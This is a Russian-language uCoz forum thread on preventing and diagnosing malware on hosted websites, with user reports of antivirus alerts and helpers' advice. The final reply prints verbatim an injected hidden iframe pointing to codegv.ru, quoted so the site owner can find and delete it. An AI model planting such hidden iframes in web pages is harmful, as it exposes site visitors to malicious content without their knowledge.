Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1561 | 11:18:43 26 Окт 2014
    Я уже писал по этому поводу, но тему перенесли и ответа нормального я так и не добился.
    Вот, что показывает, когда я зайду на форум и открою сразу много тем - в одной из них выскакивает это.

    Мне сказали, что это из за того, что на фотохостинге радикал вирус - поэтому на моем форуме показывает фишинговый адрес.
    Я вчера убил 5 или 6 часов и просмотрел в ручную все 1200 тем форума - нашел только одно фото с радикала и удалил его.
    Больше фото с радикала нету, а блокирует темы - в которых просто обычный текст, даже фото вообще нету
    сегодня зашел на форум - проверил тем 30 вроде все нормально, обрадовался. Потом через пол часа опять захожу и тут опять касперский блокирует.
    Вы мне объясните нормально, в чем причина, а не переводите в другой раздел - ТАК КАК ЭТО НЕ ВИРУС, А НЕ ПОНЯТНО ЧТО.
    Вот если что форум - servissoc.ru
    Прикрепления: 1055607.jpg (61.6 Kb)
    http://servissoc.ru/forum/ форум о социальных сетях
    Сообщение отредактировал slavarus - Воскресенье, 26 Окт 2014, 11:20:34
    Хард
    Сообщений: 446
    Репутация: 156

    Сообщение # 1562 | 13:01:03 26 Окт 2014
    Здравствуйте! Ничего подобного не обнаружил. Попробовал через "Avast" , он тоже не ругается. Обратитесь в поддержку вашего антивируса.
    Модератор в отставке :D
    Roman_Domnin
    Сообщений: 84
    Репутация: 13

    Сообщение # 1563 | 13:04:38 26 Окт 2014
    slavarus, у меня тоже касперский и все норм wink
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1564 | 14:27:54 26 Окт 2014
    Хард, Оно не часто бывает, обычно когда открываю много тем сразу

    Добавлено (26 Окт 2014, 13:11:30)
    ---------------------------------------------
    http://servissoc.ru/forum/12-1651-1 вот эту тему чаще всего блокирует.
    я уже собираюсь писать в поддержку

    Добавлено (26 Окт 2014, 14:27:54)
    ---------------------------------------------
    Отправленный Вами файл до нас не дошел. Возможно, он был вырезан антивирусом во время доставки. Пожалуйста, вышлите экземпляр повторно, поместив его в архив с паролем infected.

    Вот, что мне пришло на почту после того, как я отправил им(
    Там вообще бред и ничего не понятно, как там отправлять на этот касперский. Кто уже пробовал? может объясните как нормально написать в поддержку их?

    http://servissoc.ru/forum/ форум о социальных сетях
    Сообщение отредактировал slavarus - Воскресенье, 26 Окт 2014, 13:22:34
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1565 | 17:06:32 26 Окт 2014
    slavarus, вы на темах, где антивирус гавкает обращайте внимание на подписи пользователей. в указанной теме подпись текстовая, но он её тоже видит. я про эту тему и подпись пользователя http://servissoc.ru/forum/12-1651-1
    и вот после удаления подобных подписей пишите им. и какой файл вы пытались туда вручить? вам надо ссылку передать или образцы ссылок. вам файлы передавать точно не надо
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1566 | 18:13:48 26 Окт 2014
    webanet, У этого пользователя была подпись с bb кодом и я ее заменил на простую ссылку.
    На сайте касперского Есть Техническая поддержка и Отправка в вирусную лабораторию.
    Если писать в техническую поддержку - нужно вводить версию касперского и какая проблема ( 2 варианта ) не один не подходит.
    А если писать в лабораторию - Я выбираю Ложное срабатывание на веб-ресурс
    Там еще есть 3 варианта
    Запрос на исследование вредоносного файла
    Запрос на исследование веб ресурса
    Ложно срабатывание файла.

    Короче когда я выбираю нужное - Ложное срабатывание на веб-ресурс и дальше я пишу сообщение, файл не выбираю.
    Через 5 минут приходит письмо о том, что файл до них не дошел, не пойму причем тут файл вообще, если речь о сайте.
    http://servissoc.ru/forum/ форум о социальных сетях
    Сообщение отредактировал slavarus - Воскресенье, 26 Окт 2014, 18:15:28
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1567 | 18:38:14 26 Окт 2014
    slavarus,
    Цитата
    У этого пользователя была подпись с bb кодом и я ее заменил на простую ссылку.
    эвристика может срабатывать.
    дайте ссылку по которой отправляете запрос
    кидать надо сюда все ложки http://www.kaspersky.ru/about/opinion/opinion_form
    но у вас не ложное срабатывание. на ваш сайт срабатывает эвристика. это не сигнатуры, которые можно изменить и убрать ложку. это эвристика. а её перекраивать ради вашего сайта никто не будет
    подобные подписи надо убирать. но если ваш сайт завален продуктами, подобными пользовательской подписи, то тут сделать вряд ли что-то можно. касперский будет периодически реагировать на ваш сайт. он обязан на такое реагировать
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1568 | 19:55:36 26 Окт 2014
    webanet, Просто я не понимаю, таких форумов много. Допустим форум на котором каждый день регистрируются тысячи пользователей и у каждого своя подпись, на них же не действует почему то.

    Добавлено (26 Окт 2014, 19:53:18)
    ---------------------------------------------
    И мне что поделать сейчас?

    Добавлено (26 Окт 2014, 19:55:36)
    ---------------------------------------------
    Вот, что мне на почту пришло

    Здравствуйте,

    Нам не удалось воспроизвести детектирование нашим продуктом.
    Пожалуйста, обновите антивирусные базы.
    Если проблема сохранится, пришлите, пожалуйста, скриншот детектирования и, желательно, логи продукта.

    С уважением,
    Константин Марков | Вирусный аналитик | ЗАО "Лаборатория Касперского"

    http://servissoc.ru/forum/ форум о социальных сетях
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1569 | 20:03:41 26 Окт 2014
    slavarus, значит обновите базы антивируса и продолжайте наблюдение. как будет детект шлите его по тому же адресу, что вам ответили. если не сможете добыть логи касперского, то напишите про свои настройки хотя бы. какой у вас стоит уровень эвристики
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1570 | 20:13:35 26 Окт 2014
    webanet, Я отправил в форме которую вы дали. А до этого я отправлял через личный кабинет на сайте. Мне на почту придет информация ?
    http://servissoc.ru/forum/ форум о социальных сетях
    Сообщение отредактировал slavarus - Воскресенье, 26 Окт 2014, 20:14:03
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1571 | 20:17:16 26 Окт 2014
    slavarus, какая информация? это письмо пришло без обратного адреса?

    ---------------------------------------------
    Цитата
    Вот, что мне на почту пришло

    Здравствуйте,

    Нам не удалось воспроизвести детектирование нашим продуктом.
    Пожалуйста, обновите антивирусные базы.
    Если проблема сохранится, пришлите, пожалуйста, скриншот детектирования и, желательно, логи продукта.

    С уважением,
    Константин Марков | Вирусный аналитик | ЗАО "Лаборатория Касперского"
    вот туда и напишите, если вдруг что
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    slavarus
    Сообщений: 189
    Репутация: 4

    Сообщение # 1572 | 20:20:18 26 Окт 2014
    webanet, Ну тогда я отправлял через личный кабинет и пришло это письмо, а сейчас я отправил по ссылке которую вы дали.
    http://servissoc.ru/forum/ форум о социальных сетях
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1573 | 20:23:02 26 Окт 2014
    slavarus, да. на почту придет. на почту, которую вы указали. обновитесь и наблюдайте
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Stan-86
    Сообщений: 39
    Репутация: 0

    Сообщение # 1574 | 03:15:43 30 Окт 2014
    Здравствуйте,Avast блокирует 2 страницы сайта:
    1.http://www.masterkhv.ru/index/otdelochnye_raboty/0-7
    2.http://www.masterkhv.ru/index/dopolnitelnye_uslugi/0-8

    Вот что ответили из Avast:
    Мы проверили сайт.
    К коде обнаружен iframe со ссылкой на codegv.ru
    Необходимо от него избавиться.

    Вопрос: Как от него избавиться?

    Заранее,спасибо
    Dogica
    Сообщений: 1230
    Репутация: 353
    Уровень замечаний:

    Сообщение # 1575 | 07:08:44 30 Окт 2014
    Ищите в коде вот это и удаляйте..
    через Панель управления - Верхнее меню - Дизайн - Быстрая Замена Участков кода
    Пишите в верхнем поле это (по 1 строчке), в нижнем ставьте пробел или оставляйте пустым (чтобы заменилось на ничего)

    <iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe>

    а вообще лучше всего паралельно с удалением
    понять откуда этот код появился у вас на сайте - его у вас там море.. тут и там
    и он одинаковый везде
    это важнее чем просто удаление кода
    тяжело строить сайт, не зная что делаете... результаты иногда могут получиться удручайющими surprised sad
    удачи!

    WWW.DOGICA.COM / WWW.DOGICA.ORG
    Сообщение отредактировал Dogica - Четверг, 30 Окт 2014, 07:08:57
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: